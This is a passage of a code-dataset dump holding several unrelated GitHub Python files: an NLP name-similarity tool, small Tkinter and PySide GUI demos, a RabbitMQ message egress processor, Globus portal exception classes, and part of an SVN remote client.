libraries\nimport argparse\nimport json\nimport os\n\nimport spacy\nfrom sentence_transformers import SentenceTransformer\nfrom sentence_transformers.util import cos_sim\n\n\nclass NamSim:\n '''\n Class for checking similarity of organisations' names\n '''\n def __init__(self):\n self.model_spacy = spacy.load(\"en_core_web_sm\")\n try:\n self.model_st = SentenceTransformer('./models/1.0_db-multilingual-cased-v2')\n except Exception:\n print('Check the model folder. Perhaps it is empty.')\n\n def check_similarity(self, name_1: str, name_2: str):\n '''\n Method of NamSim for checking two str for similarity\n '''\n first = self.model_st.encode([name_1], convert_to_numpy=True)\n second = self.model_st.encode([name_2], convert_to_numpy=True)\n cosine_scores = cos_sim(first, second)\n return float(cosine_scores[0][0]) > 0.88\n\n def parse_deep(self, text: str):\n '''\n Method of NamSim for parsing text with\n Spacy and checking similarity of all organisations' names\n with SentenceTransformer\n '''\n add_val = False\n token_dic = {}\n last_tokens = []\n sentences = text.split('.')\n for sen in sentences:\n doc = self.model_spacy(sen)\n for token in doc.ents:\n if token.label_ == 'ORG' and len(token) > 1:\n print(token)\n if len(last_tokens) > 0:\n for t in last_tokens:\n if self.check_similarity(token, t):\n token_dic[t].append((token.start_char, token.end_char))\n add_val = True\n break\n if not add_val:\n last_tokens.append(token.text)\n token_dic[token.text] = []\n token_dic[token.text].append([token.start_char, token.end_char])\n add_val = False\n return token_dic\n\n def parse_text(self, path: str):\n '''\n Method of NamSim to start parsing text\n '''\n file_name = path.split('/')[-1].split('.')[0]\n if os.path.exists(path) and path.endswith('.txt'):\n with open(path, 'r') as file:\n text = file.read()\n file.close()\n text = text.strip()\n data = self.parse_deep(text)\n with open(os.path.join('./out', file_name + '.json'), 'w') as new_file:\n json.dump(data, new_file, indent=4)\n new_file.close()\n else:\n print(\"Path to file doesn't exsist\")\n\n\nif __name__ == '__main__':\n namsim = NamSim()\n parser = argparse.ArgumentParser()\n parser.add_argument('--check', type=str, nargs=2, required=False)\n parser.add_argument('--path', type=str, nargs=1, required=False)\n args = parser.parse_args()\n if args.check:\n res = namsim.check_similarity(args.check[0], args.check[1])\n print(res)\n elif args.path:\n namsim.parse_text(args.path[0])\n else:\n namsim.parse_text('./texts/1.txt')\n","repo_name":"dpkaranov/org_name_similarity","sub_path":"name_sim.py","file_name":"name_sim.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31859473033","text":"# Python will encode the text based on the default text encoding. \n# Additionally, Python will convert line endings (\\n) to whatever the platform-specific line ending is, \n# which would corrupt a binary file like an exe or png file.\n# 'wb' mode is specifically designed for writing binary data, such as images, audio files, video files,\n# and other non-textual data. When you open a file in binary write mode ('wb'), the data is written \n# as-is without any character encoding or interpretation.\n\nbinary_data = b'\\x48\\x65\\x6c\\x6c\\x6f\\x20\\x57\\x6f\\x72\\x6c\\x64' # Binary representation of \"Hello World\"\n\nwith open('binary_file.bin', 'wb') as file:\n file.write(binary_data)\n\nwith open('binary_file.bin', 'rb') as file:\n content = file.read()\n print(f\"File Content: {content}\")\n\nprint(\"Task3: writing binary file is done\")","repo_name":"Jaivik-Jariwala/InfoSec_Ciphers","sub_path":"Setup/college/Adv_py/week_4/day_1/write_binary.py","file_name":"write_binary.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23156513183","text":"import sys\n\nfrom PySide6.QtWidgets import QApplication, QLabel, QMainWindow\n\n\nclass MainWindow(QMainWindow):\n def __init__(self, *args, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n self.setCentralWidget(QLabel(\"Hello, world!\"))\n\n\napp = QApplication(sys.argv)\nwindow = MainWindow()\nwindow.show()\napp.exec_()\n","repo_name":"nyavramov/python_app_mac_app_store","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"3"} +{"seq_id":"31573730472","text":"from tkinter import *\r\nroot = Tk()\r\nc = Canvas(root, width=540, height=960, bg='white')\r\nc.pack()\r\ndata = []\r\nwith open('DS7.txt') as f:\r\n for line in f:\r\n data.append([int(x) for x in line.split()])\r\n\r\nfor i in range(len(data)):\r\n image = c.create_oval(data[i][0],data[i][1], data[i][0], data[i][1], fill='black')\r\n\r\nroot.mainloop()\r\nimage.save('res.jpg')\r\n","repo_name":"sTorba24/test","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4161175091","text":"# Copyright (c) 2001-2020 Seagate Technology LLC and/or its Affiliates\r\n#\r\n# This program is free software: you can redistribute it and/or modify it under the\r\n# terms of the GNU Affero General Public License as published by the Free Software\r\n# Foundation, either version 3 of the License, or (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful, but WITHOUT ANY\r\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A\r\n# PARTICULAR PURPOSE. See the GNU Affero General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU Affero General Public License along\r\n# with this program. If not, see . For any questions\r\n# about this software or licensing, please email opensource@seagate.com or\r\n# cortx-questions@seagate.com.\r\n\r\n\"\"\"\r\n ****************************************************************************\r\n Description: Handles outgoing messages via rabbitMQ over localhost\r\n ****************************************************************************\r\n\"\"\"\r\n\r\nimport json\r\nimport pika\r\nimport os\r\nimport time\r\nfrom sspl_test.framework.base.module_thread import ScheduledModuleThread\r\nfrom sspl_test.framework.base.internal_msgQ import InternalMsgQ\r\nfrom sspl_test.framework.utils.service_logging import logger\r\nfrom .rabbitmq_sspl_test_connector import RabbitMQSafeConnection\r\n\r\nimport ctypes\r\ntry:\r\n use_security_lib=True\r\n SSPL_SEC = ctypes.cdll.LoadLibrary('libsspl_sec.so.0')\r\nexcept Exception as ae:\r\n logger.info(\"RabbitMQegressProcessor, libsspl_sec not found, disabling authentication on egress msgs\")\r\n use_security_lib=False\r\n\r\n\r\nclass RabbitMQegressProcessor(ScheduledModuleThread, InternalMsgQ):\r\n \"\"\"Handles outgoing messages via rabbitMQ over localhost\"\"\"\r\n\r\n MODULE_NAME = \"RabbitMQegressProcessor\"\r\n PRIORITY = 1\r\n\r\n # Section and keys in configuration file\r\n SYSTEM_INFORMATION = \"SYSTEM_INFORMATION\"\r\n RACK_ID = \"rack_id\"\r\n NODE_ID = \"node_id\"\r\n CLUSTER_ID = \"cluster_id\"\r\n SITE_ID = \"site_id\"\r\n\r\n RABBITMQPROCESSOR = MODULE_NAME.upper()\r\n VIRT_HOST = 'virtual_host'\r\n\r\n PRIMARY_RABBITMQ_HOST = 'primary_rabbitmq_host'\r\n EXCHANGE_NAME = 'exchange_name'\r\n QUEUE_NAME = 'queue_name'\r\n ROUTING_KEY = 'routing_key'\r\n\r\n ACK_QUEUE_NAME = 'ack_queue_name'\r\n ACK_ROUTING_KEY = 'ack_routing_key'\r\n\r\n USER_NAME = 'username'\r\n PASSWORD = 'password'\r\n SIGNATURE_USERNAME = 'message_signature_username'\r\n SIGNATURE_TOKEN = 'message_signature_token'\r\n SIGNATURE_EXPIRES = 'message_signature_expires'\r\n IEM_ROUTE_ADDR = 'iem_route_addr'\r\n IEM_ROUTE_EXCHANGE_NAME = 'iem_route_exchange_name'\r\n\r\n @staticmethod\r\n def name():\r\n \"\"\" @return: name of the module.\"\"\"\r\n return RabbitMQegressProcessor.MODULE_NAME\r\n\r\n def __init__(self):\r\n super(RabbitMQegressProcessor, self).__init__(self.MODULE_NAME,\r\n self.PRIORITY)\r\n\r\n def initialize(self, conf_reader, msgQlist, product):\r\n \"\"\"initialize configuration reader and internal msg queues\"\"\"\r\n # Initialize ScheduledMonitorThread\r\n super(RabbitMQegressProcessor, self).initialize(conf_reader)\r\n\r\n # Initialize internal message queues for this module\r\n super(RabbitMQegressProcessor, self).initialize_msgQ(msgQlist)\r\n\r\n # Flag denoting that a shutdown message has been placed\r\n # into our message queue from the main sspl_ll_d handler\r\n self._request_shutdown = False\r\n\r\n self._msg_sent_succesfull = True\r\n\r\n self._product = product\r\n\r\n # Configure RabbitMQ Exchange to transmit messages\r\n self._connection = None\r\n self._read_config()\r\n self._connection = RabbitMQSafeConnection(\r\n self._username, self._password, self._virtual_host,\r\n self._exchange_name, self._routing_key, self._queue_name\r\n )\r\n self._ack_connection = RabbitMQSafeConnection(\r\n self._username, self._password, self._virtual_host,\r\n self._exchange_name, self._ack_routing_key, self._ack_queue_name\r\n )\r\n self._iem_connection = RabbitMQSafeConnection(\r\n self._username, self._password, self._virtual_host,\r\n self._iem_route_exchange_name, self._routing_key,\r\n self._queue_name\r\n )\r\n # Display values used to configure pika from the config file\r\n self._log_debug(\"RabbitMQ user: %s\" % self._username)\r\n self._log_debug(\"RabbitMQ exchange: %s, routing_key: %s, vhost: %s\" %\r\n (self._exchange_name, self._routing_key, self._virtual_host))\r\n\r\n def run(self):\r\n \"\"\"Run the module periodically on its own thread. \"\"\"\r\n self._log_debug(\"Start accepting requests\")\r\n\r\n #self._set_debug(True)\r\n #self._set_debug_persist(True)\r\n\r\n try:\r\n # Loop thru all messages in queue until and transmit\r\n while not self._is_my_msgQ_empty():\r\n # Only get a new msg if we've successfully processed the current one\r\n if self._msg_sent_succesfull:\r\n self._jsonMsg = self._read_my_msgQ()\r\n\r\n if self._jsonMsg is not None:\r\n self._transmit_msg_on_exchange()\r\n\r\n except Exception:\r\n # Log it and restart the whole process when a failure occurs\r\n logger.exception(\"RabbitMQegressProcessor restarting\")\r\n\r\n # Configure RabbitMQ Exchange to receive messages\r\n self._get_connection()\r\n self._get_ack_connection()\r\n\r\n self._log_debug(\"Finished processing successfully\")\r\n\r\n # Shutdown is requested by the sspl_ll_d shutdown handler\r\n # placing a 'shutdown' msg into our queue which allows us to\r\n # finish processing any other queued up messages.\r\n if self._request_shutdown == True:\r\n self.shutdown()\r\n else:\r\n self._scheduler.enter(1, self._priority, self.run, ())\r\n\r\n def _read_config(self):\r\n \"\"\"Configure the RabbitMQ exchange with defaults available\"\"\"\r\n try:\r\n self._virtual_host = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.VIRT_HOST,\r\n 'SSPL')\r\n\r\n # Read common RabbitMQ configuration\r\n self._primary_rabbitmq_host = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.PRIMARY_RABBITMQ_HOST,\r\n 'localhost')\r\n\r\n # Read RabbitMQ configuration for sensor messages\r\n self._queue_name = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.QUEUE_NAME,\r\n 'sensor-queue')\r\n self._exchange_name = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.EXCHANGE_NAME,\r\n 'sspl-out')\r\n self._routing_key = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.ROUTING_KEY,\r\n 'sensor-key')\r\n # Read RabbitMQ configuration for Ack messages\r\n self._ack_queue_name = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.ACK_QUEUE_NAME,\r\n 'sensor-queue')\r\n self._ack_routing_key = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.ACK_ROUTING_KEY,\r\n 'sensor-key')\r\n\r\n self._username = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.USER_NAME,\r\n 'sspluser')\r\n self._password = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.PASSWORD,\r\n 'sspl4ever')\r\n self._signature_user = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.SIGNATURE_USERNAME,\r\n 'sspl-ll')\r\n self._signature_token = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.SIGNATURE_TOKEN,\r\n 'FAKETOKEN1234')\r\n self._signature_expires = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.SIGNATURE_EXPIRES,\r\n \"3600\")\r\n self._iem_route_addr = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.IEM_ROUTE_ADDR,\r\n '')\r\n self._iem_route_exchange_name = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.IEM_ROUTE_EXCHANGE_NAME,\r\n 'sspl-in')\r\n self._rack_id = self._conf_reader._get_value_with_default(\r\n self.SYSTEM_INFORMATION, self.RACK_ID, '')\r\n\r\n self._node_id = self._conf_reader._get_value_with_default(\r\n self.SYSTEM_INFORMATION, self.NODE_ID, '')\r\n\r\n self._cluster_id = self._conf_reader._get_value_with_default(\r\n self.SYSTEM_INFORMATION, self.CLUSTER_ID, '')\r\n\r\n self._site_id = self._conf_reader._get_value_with_default(\r\n self.SYSTEM_INFORMATION, self.SITE_ID, '')\r\n\r\n\r\n if self._iem_route_addr != \"\":\r\n logger.info(\" Routing IEMs to host: %s\" % self._iem_route_addr)\r\n logger.info(\" Using IEM exchange: %s\" % self._iem_route_exchange_name)\r\n except Exception as ex:\r\n logger.exception(\"RabbitMQegressProcessor, _read_config: %r\" % ex)\r\n\r\n def _add_signature(self):\r\n \"\"\"Adds the authentication signature to the message\"\"\"\r\n self._log_debug(\"_add_signature, jsonMsg: %s\" % self._jsonMsg)\r\n self._jsonMsg[\"username\"] = self._signature_user\r\n self._jsonMsg[\"expires\"] = int(self._signature_expires)\r\n self._jsonMsg[\"time\"] = str(int(time.time()))\r\n\r\n if use_security_lib:\r\n authn_token_len = len(self._signature_token) + 1\r\n session_length = int(self._signature_expires)\r\n token = ctypes.create_string_buffer(SSPL_SEC.sspl_get_token_length())\r\n\r\n SSPL_SEC.sspl_generate_session_token(\r\n self._signature_user, authn_token_len,\r\n self._signature_token, session_length, token)\r\n\r\n # Generate the signature\r\n msg_len = len(self._jsonMsg) + 1\r\n sig = ctypes.create_string_buffer(SSPL_SEC.sspl_get_sig_length())\r\n SSPL_SEC.sspl_sign_message(msg_len, str(self._jsonMsg), self._signature_user,\r\n token, sig)\r\n\r\n self._jsonMsg[\"signature\"] = str(sig.raw)\r\n else:\r\n self._jsonMsg[\"signature\"] = \"SecurityLibNotInstalled\"\r\n\r\n def _transmit_msg_on_exchange(self):\r\n \"\"\"Transmit json message onto RabbitMQ exchange\"\"\"\r\n self._log_debug(\"_transmit_msg_on_exchange, jsonMsg: %s\" % self._jsonMsg)\r\n\r\n try:\r\n # Check for shut down message from sspl_ll_d and set a flag to shutdown\r\n # once our message queue is empty\r\n if self._jsonMsg.get(\"message\").get(\"actuator_response_type\") is not None and \\\r\n self._jsonMsg.get(\"message\").get(\"actuator_response_type\").get(\"thread_controller\") is not None and \\\r\n self._jsonMsg.get(\"message\").get(\"actuator_response_type\").get(\"thread_controller\").get(\"thread_response\") == \\\r\n \"SSPL-LL is shutting down\":\r\n logger.info(\"RabbitMQegressProcessor, _transmit_msg_on_exchange, received\" \\\r\n \"global shutdown message from sspl_ll_d\")\r\n self._request_shutdown = True\r\n\r\n msg_props = pika.BasicProperties()\r\n msg_props.content_type = \"text/plain\"\r\n\r\n # Publish json message to the correct channel\r\n # NOTE: We need to route ThreadController messages to ACK channel.\r\n # We can't modify schema as it will affect other modules too. As a\r\n # temporary solution we have added a extra check to see if actuator_response_type\r\n # is \"thread_controller\".\r\n # TODO: Find a proper way to solve this issue. Avoid changing\r\n # core egress processor code\r\n if self._jsonMsg.get(\"message\").get(\"actuator_response_type\") is not None and \\\r\n (self._jsonMsg.get(\"message\").get(\"actuator_response_type\").get(\"ack\") is not None or \\\r\n self._jsonMsg.get(\"message\").get(\"actuator_response_type\").get(\"thread_controller\") is not None):\r\n self._add_signature()\r\n jsonMsg = json.dumps(self._jsonMsg).encode('utf8')\r\n self._ack_connection.publish(exchange=self._exchange_name,\r\n routing_key=self._ack_routing_key,\r\n properties=msg_props,\r\n body=jsonMsg)\r\n # Routing requests for IEM msgs sent from the LoggingMsgHandler\r\n elif self._jsonMsg.get(\"message\").get(\"IEM_routing\") is not None:\r\n log_msg = self._jsonMsg.get(\"message\").get(\"IEM_routing\").get(\"log_msg\")\r\n self._log_debug(\"Routing IEM: %s\" % log_msg)\r\n if self._iem_route_addr != \"\":\r\n self._iem_connection.publish(exchange=self._iem_route_exchange_name,\r\n routing_key=self._routing_key,\r\n properties=msg_props,\r\n body=str(log_msg))\r\n else:\r\n logger.warn(\"RabbitMQegressProcessor, Attempted to route IEM without a valid 'iem_route_addr' set.\")\r\n\r\n elif self._jsonMsg.get(\"message\") is not None:\r\n message = self._jsonMsg.get(\"message\")\r\n if message.get(\"actuator_request_type\") or \\\r\n message.get(\"sensor_request_type\") is not None:\r\n logger.error(\"inside egress, test actuator\")\r\n unique_routing_key = f'{self._routing_key}_node{self._node_id}'\r\n logger.info(f\"Connecting using routing key: {unique_routing_key}\")\r\n logger.error(f\"Connecting using routing key: {unique_routing_key}\")\r\n self._add_signature()\r\n jsonMsg = json.dumps(self._jsonMsg).encode('utf8')\r\n self._connection.publish(exchange=self._exchange_name,\r\n routing_key=unique_routing_key,\r\n properties=msg_props,\r\n body=jsonMsg)\r\n\r\n else:\r\n self._add_signature()\r\n jsonMsg = json.dumps(self._jsonMsg).encode('utf8')\r\n self._connection.publish(exchange=self._exchange_name,\r\n routing_key=self._routing_key,\r\n properties=msg_props,\r\n body=jsonMsg)\r\n # No exceptions thrown so success\r\n self._log_debug(\"_transmit_msg_on_exchange, Successfully Sent: %s\" % self._jsonMsg)\r\n self._msg_sent_succesfull = True\r\n\r\n except Exception as ex:\r\n logger.exception(\"RabbitMQegressProcessor, _transmit_msg_on_exchange: %r\" % ex)\r\n self._msg_sent_succesfull = False\r\n\r\n def shutdown(self):\r\n \"\"\"Clean up scheduler queue and gracefully shutdown thread\"\"\"\r\n super(RabbitMQegressProcessor, self).shutdown()\r\n","repo_name":"ArchanaLimaye/cortx-monitor","sub_path":"sspl_test/rabbitmq/rabbitmq_egress_processor.py","file_name":"rabbitmq_egress_processor.py","file_ext":"py","file_size_in_byte":17338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"11690511993","text":"\n\nclass GlobusPortalException(Exception):\n def __init__(self, code='', message='', index=''):\n \"\"\"\n :param code: A short string that can be checked against, such as\n 'PermissionDenied'\n :param message: A longer string that describes the problem and action\n that should be taken.\n \"\"\"\n self.code = code or 'UnexpectedError'\n self.message = message or (\n 'Globus Portal Framework encountered an unexpected error'\n )\n self.index = index or ''\n\n def __str__(self):\n return '{} on {}: {}'.format(self.code, self.index, self.message)\n\n def __repr__(self):\n return str(self)\n\n\nclass PortalAuthException(GlobusPortalException):\n def __init__(self, code='', message=''):\n self.code = code or 'PortalAuthException'\n self.message = message or 'The portal encountered an ' \\\n 'error authorizing this action'\n self.index = ''\n\n\nclass GroupsException(GlobusPortalException):\n def __init__(self, code='', message=''):\n self.code = code or 'GroupsException'\n self.message = message or 'User Globus Groups could not be fetched'\n self.index = 'Index Not Applicable'\n\n\nclass IndexNotFound(GlobusPortalException):\n \"\"\"\n Exception when user tried to access an index not defined by this portal\n \"\"\"\n def __init__(self, index, **kwargs):\n super().__init__(**kwargs)\n self.code = 'IndexNotFound'\n self.index = index\n self.message = ('The index \"{}\" was not defined for this portal'\n ''.format(index)\n )\n\n\nclass PreviewException(GlobusPortalException):\n \"\"\"\n Exceptions when trying to fetch data from Globus Preview\n \"\"\"\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.code = 'UnexpectedError'\n self.message = 'There was an unexpected error ' \\\n 'when fetching preview data.'\n\n\nclass PreviewPermissionDenied(PreviewException):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.code = 'PermissionDenied'\n self.message = 'You do not have access to view this data'\n\n\nclass PreviewURLNotFound(PreviewException):\n def __init__(self, subject, **kwargs):\n super().__init__(**kwargs)\n self.code = 'URLNotFound'\n self.message = 'No Globus HTTP URL was provided for this search ' \\\n 'entry'\n self.subject = subject\n\n\nclass PreviewNotFound(PreviewException):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.code = 'NotFound'\n self.message = 'Could not find file on the preview server'\n\n\nclass PreviewServerError(PreviewException):\n def __init__(self, http_code, server_error, **kwargs):\n super().__init__(**kwargs)\n self.code = 'ServerError'\n self.message = 'There was a problem with the Preview Server'\n self.http_code = http_code\n self.server_error = server_error\n\n def __str__(self):\n return '{}\\nHttpCode: {}\\nServer Text: {}'.format(super().__str__(),\n self.http_code,\n self.server_error)\n\n\nclass PreviewBinaryData(PreviewException):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.code = 'BinaryData'\n self.message = 'Preview is unable to display binary data.'\n\n\nclass ExpiredGlobusToken(GlobusPortalException):\n def __init__(self, token_name='', **kwargs):\n super().__init__(**kwargs)\n \"\"\"\n :param token_name: Name of Globus Token\n \"\"\"\n self.code = 'ExpiredGlobusToken'\n self.token_name = token_name\n if token_name:\n self.message = 'Your Globus Token has expired: \"{}\"' \\\n ''.format(token_name)\n else:\n self.message = 'Your Globus Token has expired.'\n\n\nclass InvalidRangeFilter(GlobusPortalException):\n def __init__(self, code='', message=''):\n \"\"\"\n :param code: A short string that can be checked against, such as\n 'PermissionDenied'\n :param message: A longer string that describes the problem and action\n that should be taken.\n \"\"\"\n super().__init__()\n self.code = code or 'RangeFilterError'\n self.message = message or 'Invalid Range Encountered'\n\n def __str__(self):\n return '{}: {}'.format(self.code, self.message)\n\n def __repr__(self):\n return str(self)\n","repo_name":"globus/django-globus-portal-framework","sub_path":"globus_portal_framework/exc.py","file_name":"exc.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"36854601195","text":"from tkinter import *\n# from tkinter import ttk\nfrom PIL import Image, ImageTk\n\n\nclass FaceRecSys:\n\n def __init__(self, root):\n self.root = root\n self.root.geometry('1530x790+0+0')\n self.root.title('Face Recognition Student Attendance System')\n root.resizable(0, 0)\n root.attributes('-alpha', 0.95)\n\n # Background Image\n imgBg = Image.open(\n r\"images\\colorBg.png\")\n imgBg = imgBg.resize((1530, 790), Image.ANTIALIAS)\n self.PhoImgBg = ImageTk.PhotoImage(imgBg)\n\n BgImg = Label(self.root, image=self.PhoImgBg)\n BgImg.place(x=0, y=0, width=1530, height=790)\n\n titleLabel = Label(text=\"Student Attendance System\",\n font=(\"Calibri Light\", 30,),\n bg='#E8F0F2', fg='black')\n\n titleLabel.place(x=0, y=120, width=1530, height=50)\n\n # Making buttons for 'Student Details', 'Face Detector', 'Train Data', 'Attendance', 'Photos', 'Exit'\n\n # Student detail button\n studenButton = Image.open(r\"images\\StudentButton.jpg\")\n studenButton = studenButton.resize((130, 130), Image.ANTIALIAS)\n self.PhoImgStdBtn = ImageTk.PhotoImage(studenButton)\n\n Btn1 = Button(BgImg, image=self.PhoImgStdBtn, cursor='hand2')\n Btn1.place(x=200, y=220, width=130, height=130)\n\n Btn1 = Button(BgImg, text='Student details', cursor='hand2',\n font=(\"Calibri\", 12, 'bold',),\n bg='black', fg='white')\n Btn1.place(x=200, y=320, width=129, height=30)\n\n # Face Detect Button\n faceDetectButton = Image.open(r\"images\\facedetect.PNG\")\n faceDetectButton = faceDetectButton.resize((130, 130), Image.ANTIALIAS)\n self.PhoImgFacDetBtn = ImageTk.PhotoImage(faceDetectButton)\n\n Btn2 = Button(BgImg, image=self.PhoImgFacDetBtn, cursor='hand2')\n Btn2.place(x=450, y=220, width=130, height=130)\n\n Btn2 = Button(BgImg, text='Detect face', cursor='hand2',\n font=(\"Calibri\", 12, 'bold',),\n bg='black', fg='white')\n Btn2.place(x=450, y=320, width=129, height=30)\n\n # Attendance Button\n AttendanceButton = Image.open(r\"images\\attendance1.PNG\")\n AttendanceButton = AttendanceButton.resize((130, 130), Image.ANTIALIAS)\n self.PhoImgAttendBtn = ImageTk.PhotoImage(AttendanceButton)\n\n Btn3 = Button(BgImg, image=self.PhoImgAttendBtn, cursor='hand2')\n Btn3.place(x=700, y=220, width=130, height=130)\n\n Btn3 = Button(BgImg, text='Attendance', cursor='hand2',\n font=(\"Calibri\", 12, 'bold',),\n bg='black', fg='white')\n Btn3.place(x=700, y=320, width=129, height=30)\n\n # Help desk button\n\n HelpDskButton = Image.open(r\"images\\helpdesk.PNG\")\n HelpDskButton = HelpDskButton.resize((130, 130), Image.ANTIALIAS)\n self.PhoImgHelpdskBtn = ImageTk.PhotoImage(HelpDskButton)\n\n Btn4 = Button(BgImg, image=self.PhoImgHelpdskBtn, cursor='hand2')\n Btn4.place(x=950, y=220, width=130, height=130)\n\n Btn4 = Button(BgImg, text='Help desk', cursor='hand2',\n font=(\"Calibri\", 12, 'bold',),\n bg='black', fg='white')\n Btn4.place(x=950, y=320, width=129, height=30)\n\n #Train data Button\n\n TrainFacButton = Image.open(r\"images\\train data.PNG\")\n TrainFacButton = TrainFacButton.resize((130, 130), Image.ANTIALIAS)\n self.PhoImgTrainFacBtn = ImageTk.PhotoImage(TrainFacButton)\n\n Btn5 = Button(BgImg, image=self.PhoImgTrainFacBtn, cursor='hand2')\n Btn5.place(x=1200, y=220, width=130, height=130)\n\n Btn5 = Button(BgImg, text='Train data', cursor='hand2',\n font=(\"Calibri\", 12, 'bold',),\n bg='black', fg='white')\n Btn5.place(x=1200, y=320, width=129, height=30)\n\nif __name__ == \"__main__\":\n root = Tk() # root is needed to call by toolkit (tk)\n obj = FaceRecSys(root)\n root.mainloop()\n","repo_name":"Sabit-Bin-Hamid/cse299-frsas","sub_path":"tempCodeRunnerFile.py","file_name":"tempCodeRunnerFile.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"11344846916","text":"import bisect\nimport calendar\nimport json\nimport os\nimport re\nimport tempfile\n\nfrom datetime import datetime\n\nfrom webkitcorepy import decorators, string_utils, CallByNeed\nfrom webkitscmpy.remote.scm import Scm\nfrom webkitscmpy import Commit, Version\n\nrequests = CallByNeed(lambda: __import__('requests'))\nxmltodict = CallByNeed(lambda: __import__('xmltodict'))\n\n\nclass Svn(Scm):\n URL_RE = re.compile(r'\\Ahttps?://svn.(?P\\S+)/repository/\\S+\\Z')\n DATA_RE = re.compile(br'<[SD]:(?P\\S+)>(?P.*)')\n CACHE_VERSION = Version(1)\n\n @classmethod\n def is_webserver(cls, url):\n return True if cls.URL_RE.match(url) else False\n\n def __init__(self, url, dev_branches=None, prod_branches=None, contributors=None, id=None, cache_path=None, classifier=None):\n if url[-1] != '/':\n url += '/'\n if not self.is_webserver(url):\n raise self.Exception(\"'{}' is not a valid SVN webserver\".format(url))\n\n super(Svn, self).__init__(\n url,\n dev_branches=dev_branches, prod_branches=prod_branches,\n contributors=contributors,\n id=id or url.split('/')[-2].lower(),\n classifier=classifier,\n )\n\n if not cache_path:\n from webkitscmpy.mocks import remote\n host = 'svn.{}'.format(self.URL_RE.match(self.url).group('host'))\n if host in remote.Svn.remotes:\n host = 'mock-{}'.format(host)\n cache_path = os.path.join(tempfile.gettempdir(), host, 'webkitscmpy-cache.json')\n self._cache_path = cache_path\n\n if os.path.exists(self._cache_path):\n try:\n with self._cache_lock(), open(self._cache_path) as file:\n self._metadata_cache = json.load(file)\n except BaseException:\n self._metadata_cache = dict(version=str(self.CACHE_VERSION))\n else:\n self._metadata_cache = dict(version=str(self.CACHE_VERSION))\n\n @property\n def is_svn(self):\n return True\n\n def checkout_url(self, ssh=False, http=False):\n if ssh:\n raise ValueError('Subversion does not support an ssh checkout')\n return '{}{}'.format(self.url, self.default_branch)\n\n @decorators.Memoize(timeout=60)\n def _latest(self):\n response = requests.request(\n method='OPTIONS',\n url=self.url,\n headers={\n 'Content-Type': 'text/xml',\n 'Accept-Encoding': 'gzip',\n 'DEPTH': '1',\n }, data='\\n'\n '\\n'\n ' \\n'\n '\\n',\n )\n if response.status_code != 200:\n return None\n return int(response.headers.get('SVN-Youngest-Rev'))\n\n @decorators.Memoize(cached=False)\n def info(self, branch=None, revision=None, tag=None):\n if tag and branch:\n raise ValueError('Cannot specify both branch and tag')\n if tag and revision:\n raise ValueError('Cannot specify both branch and tag')\n\n if not revision:\n branch = branch or self.default_branch\n revision = self._latest()\n if not revision:\n return None\n\n if not revision:\n raise ValueError('Failed to find the latest revision')\n\n url = '{}!svn/rvr/{}'.format(self.url, revision)\n if branch and branch != self.default_branch and '/' not in branch:\n url = '{}/branches/{}'.format(url, branch)\n elif tag:\n url = '{}/tags/{}'.format(url, tag)\n elif branch:\n url = '{}/{}'.format(url, branch or self.default_branch)\n\n response = requests.request(\n method='PROPFIND',\n url=url,\n headers={\n 'Content-Type': 'text/xml',\n 'Accept-Encoding': 'gzip',\n 'DEPTH': '1',\n }, data='\\n'\n ' \\n'\n ' \\n'\n ' \\n'\n ' \\n'\n ' \\n'\n ' \\n'\n ' \\n'\n ' \\n'\n '\\n',\n )\n if response.status_code not in [200, 207]:\n return {}\n\n response = xmltodict.parse(response.text)\n response = response.get('D:multistatus', response).get('D:response', [])\n if not response:\n return {}\n\n response = response[0] if isinstance(response, list) else response\n response = response['D:propstat'][0]['D:prop']\n\n return {\n 'Last Changed Rev': response['lp1:version-name'],\n 'Last Changed Author': response.get('lp1:creator-displayname'),\n 'Last Changed Date': ' '.join(response['lp1:creationdate'].split('T')).split('.')[0],\n 'Revision': revision,\n }\n\n @property\n def default_branch(self):\n return 'trunk'\n\n def list(self, category):\n revision = self._latest()\n if not revision:\n return []\n\n response = requests.request(\n method='PROPFIND',\n url='{}!svn/rvr/{}/{}'.format(self.url, revision, category),\n headers={\n 'Content-Type': 